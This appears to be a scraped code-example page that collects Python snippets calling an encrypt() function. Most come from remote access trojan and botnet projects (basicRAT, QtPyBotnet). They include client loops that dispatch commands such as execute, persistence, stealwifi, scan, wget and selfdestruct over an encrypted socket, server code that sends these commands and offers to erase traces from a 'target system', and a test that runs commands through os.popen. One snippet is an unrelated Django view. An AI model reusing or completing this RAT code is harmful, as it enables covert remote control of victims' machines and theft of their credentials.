コード例 #1
0
ファイル: crypt_test.py プロジェクト: Hack404-007/basicRAT 
def main():
    # prep data to send to server
    data = server_to_client(CMD, ACT)
    data = dict2json(data)
    enc_data = encrypt(data, KEY)

    # data sent to client
    dec_data = decrypt(enc_data, KEY)
    dec_data = json2dict(dec_data)
    dec_cmd, dec_act = dec_data['command'], dec_data['action']

    # things are working so far :)
    if (CMD == dec_cmd) and (ACT == dec_act):
        print('working!')
    results = os.popen('%s %s' % (CMD, ACT)).read()

    # prep data to send to client
    data = client_to_server(results)
    data = dict2json(data)
    enc_data = encrypt(data, KEY)

    # data sent to server
    dec_data = decrypt(enc_data, KEY)
    dec_data = json2dict(dec_data)
    dec_results = dec_data['results']

    print(dec_results)
コード例 #2
0
def client_loop(conn, dhkey):
    while True:
        results = ''

        # wait to receive data from server
        data = crypto.decrypt(conn.recv(4096), dhkey)

        # seperate data into command and action
        cmd, _, action = data.partition(' ')

        if cmd == 'kill':
            conn.close()
            return 1

        elif cmd == 'selfdestruct':
            conn.close()
            toolkit.selfdestruct(PLAT)

        elif cmd == 'goodbye':
            conn.shutdown(socket.SHUT_RDWR)
            conn.close()
            break

        elif cmd == 'rekey':
            dhkey = crypto.diffiehellman(conn)

        elif cmd == 'persistence':
            results = persistence.run(PLAT)

        elif cmd == 'scan':
            results = scan.single_host(action)

        elif cmd == 'survey':
            results = survey.run(PLAT)

        elif cmd == 'cat':
            results = toolkit.cat(action, PLAT)

        elif cmd == 'execute':
            results = toolkit.execute(action)

        elif cmd == 'stealwifi':
            results = toolkit.stealwifi(PLAT)

        elif cmd == 'ls':
            results = toolkit.ls(action, PLAT)

        elif cmd == 'pwd':
            results = toolkit.pwd(PLAT)

        elif cmd == 'unzip':
            results = toolkit.unzip(action)

        elif cmd == 'wget':
            results = toolkit.wget(action)

        results += '\n{} completed.'.format(cmd)

        conn.send(crypto.encrypt(results, dhkey))
コード例 #3
0
ファイル: SecureServer.py プロジェクト: desty2k/QtPyBotnet 
 def write(self, device: Device, message: dict):
     try:
         if device.key:
             message = json.dumps(message, cls=MessageEncoder).encode()
             message = encrypt(message, device.key)
             super().write(device, message)
     except (json.JSONDecodeError, InvalidToken):
         self.encryption_error.emit(Device, message)
コード例 #4
0
ファイル: basicRAT_server.py プロジェクト: world547/basicRAT 
 def send_client(self, cmd, action, client):
     try:
         data = server_to_client(cmd, action)
         data = dict2json(data)
         enc_data = encrypt(data, client.dhkey)
         client.conn.send(enc_data)
     except Exception as e:
         print('Error: {}'.format(e))
コード例 #5
0
ファイル: server.py プロジェクト: harshivara/RAT 
    def send(self, prompt):
        if not self.alive:
            print 'Error: Client not connected.'
            return

        # check for old output
        readable, _, _ = select.select([self.conn], [], [], 0)
        if readable:
            print self.old_output(0)

        # seperate prompt into command and action
        cmd, _, action = prompt.partition(' ')

        # selfdestruct rat
        if cmd == 'selfdestruct':
            if raw_input('Remove all traces of basicRAT from the target ' \
                         'system (y/N)? ').startswith('y'):
                print 'Running selfdestruct...'
                self.conn.send(encrypt(prompt, self.dhkey))
                self.conn.close()
            return

        # send prompt to client
        try:
            self.conn.send(encrypt(prompt, self.dhkey))
        except socket.error:
            print 'Error: Could not connect to client.'
            return
        self.conn.settimeout(1)

        # kill client connection
        if cmd == 'kill':
            self.conn.close()

        if cmd == 'rekey':
            self.dhkey = diffiehellman(self.conn)

        # results of execute, persistence, scan, survey, unzip, wget, or stealwifi
        if cmd in [
                'cat', 'execute', 'ls', 'persistence', 'pwd', 'rekey', 'scan',
                'survey', 'unzip', 'wget', 'stealwifi'
        ]:
            print 'Running {}...'.format(cmd)
            recv_data = decrypt(self.conn.recv(4096), self.dhkey)
            print recv_data
コード例 #6
0
ファイル: SecureServer.py プロジェクト: desty2k/QtPyBotnet 
 def write_all(self, message: dict):
     message = json.dumps(message, cls=MessageEncoder).encode()
     for device in self.get_devices():
         if device.key:
             try:
                 encrypted = encrypt(message, device.key)
                 super().write(device, encrypted)
             except (json.JSONDecodeError, InvalidToken):
                 self.encryption_error.emit(device, message)
コード例 #7
0
def client_loop(conn, dhkey):
    while True:
        results = ''

        # wait to receive data from server
        data = crypto.decrypt(conn.recv(4096), dhkey)

        # error checking here! for faulty shit (both sides of recv)
        data = json2dict(data)
        cmd, action = data['command'], data['action']

        if cmd == 'kill':
            conn.close()
            return 1

        elif cmd == 'selfdestruct':
            conn.close()
            toolkit.selfdestruct(PLAT)

        elif cmd == 'quit':
            conn.shutdown(socket.SHUT_RDWR)
            conn.close()
            break

        elif cmd == 'persistence':
            results = persistence.run(PLAT)

        elif cmd == 'scan':
            results = scan.single_host(action)

        elif cmd == 'survey':
            results = survey.run(PLAT)

        elif cmd == 'cat':
            results = toolkit.cat(action)

        elif cmd == 'execute':
            results = toolkit.execute(action)

        elif cmd == 'ls':
            results = toolkit.ls(action)

        elif cmd == 'pwd':
            results = toolkit.pwd()

        elif cmd == 'unzip':
            results = toolkit.unzip(action)

        elif cmd == 'wget':
            results = toolkit.wget(action)

        results = results.rstrip() + '\n{} completed.'.format(cmd)

        data = client_to_server(results)
        data = dict2json(data)

        conn.send(crypto.encrypt(data, dhkey))
コード例 #8
0
 def send_client(self, message, client):
     try:
         enc_message = encrypt(message, client.dhkey)
         client.conn.send(enc_message)
     except Exception as e:
         print 'Error: {}'.format(e)
コード例 #9
0
ファイル: basicRAT_server.py プロジェクト: james0751/basicRAT 
 def send_client(self, message, client):
     try:
         enc_message = encrypt(message, client.dhkey)
         client.conn.send(enc_message)
     except:
         print 'Error: Could not connect to client.'
コード例 #10
0
ファイル: views.py プロジェクト: lucekdudek/embigo 
def space(request, space_id='00000000-0000-0000-0000-000000000000'):
    """
    Display a space

    **Context**
        'space': this space
        'own_spaces': list of login user's spaces
        'other_spaces': list of login user's spaces witch user can see
        'collaborators': list of space's users
        'messages': list of space's messages
        'can_add_message': rights flag
        'can_create_space': rights flag
        'can_edit_space': rights flag
        'can_archive_space': rights flag
        'can_delete_space': rights flag
        'can_add_user:'******'can_edit_user_rights': rights flag

    **Template:**
    :template:`space.html`
    """
    user = request.user
    space = get_object_or_404(Space, pk=space_id)
    if user_see_space(user, space):
        try:
            space_user = get_space_user(user, space)
        except SpaceUser.DoesNotExist:
            if space.is_embigo_space():
                rights = embigo_default_rights()
            else:
                rights = user_default_rights_of_public_space()
            space_user = SpaceUser(uid=uuid1(), rights=rights, space=space, user=user)
            space_user.save()

        children_list = [c for c in space.children.all() if c.is_active()]
        user_spaces = {}
        for c in children_list:
            if user_see_child(user, space_user, c):
                c_user = get_space_user_or_none(user, c)
                user_spaces[c] = [gc for gc in c.children.all() if gc.is_active() and user_see_child(user, c_user, gc)]

        parent_collaborators = []
        if space.parent:
            try:
                parent_user = SpaceUser.objects.get(space=space.parent, user=user)
            except SpaceUser.DoesNotExist:
                parent_user = None
            if parent_user and parent_user.can(SEE_USERS):
                parent_collaborators = SpaceUser.objects.filter(space=space.parent)
                parent_collaborators = [pc for pc in parent_collaborators if
                                        not user_is_space_user(pc.user, space) and space_user.can(SEE_USERS)]

        can_add_message = space_user.can(ADD_MESSAGE)
        can_create_space = space_user.can(CREATE_SPACE)
        can_edit_space = space_user.can(EDIT_SPACE)
        can_archive_space = space_user.can(ARCHIVE_SPACE)
        can_delete_space = space_user.can(DELETE_SPACE)
        can_add_user = space_user.can(ADD_USER)
        can_edit_user_rights = space_user.can(EDIT_RIGHTS)
        can_see_users = space_user.can(SEE_USERS)

        user_key = encrypt(SECRET_KEY_WEBSOCKET, request.session.session_key)

        websocket_ip = urlparse("http://" + request.META["HTTP_HOST"]).hostname
        websocket_server_address = 'ws://' + websocket_ip + ':' + str(WEBSOCKET_PORT) + '/';

        context = {
            'space': space,

            'user_spaces': user_spaces,

            'parent_collaborators': parent_collaborators,

            'can_add_message': can_add_message,
            'can_create_space': can_create_space,
            'can_edit_space': can_edit_space,
            'can_archive_space': can_archive_space,
            'can_delete_space': can_delete_space,
            'can_add_user': can_add_user,
            'can_edit_user_rights': can_edit_user_rights,
            'can_see_users': can_see_users,

            'user_key': user_key,
            'websocket_server_address': websocket_server_address
        }
        return render(request, 'space.html', context)
    else:
        return HttpResponseRedirect("/")
コード例 #11
0
 def send_client(self, message, client):
     try:
         enc_message = encrypt(message, client.dhkey)
         client.conn.send(enc_message)
     except Exception as e:
         print("[!]: {}".format(str(e)))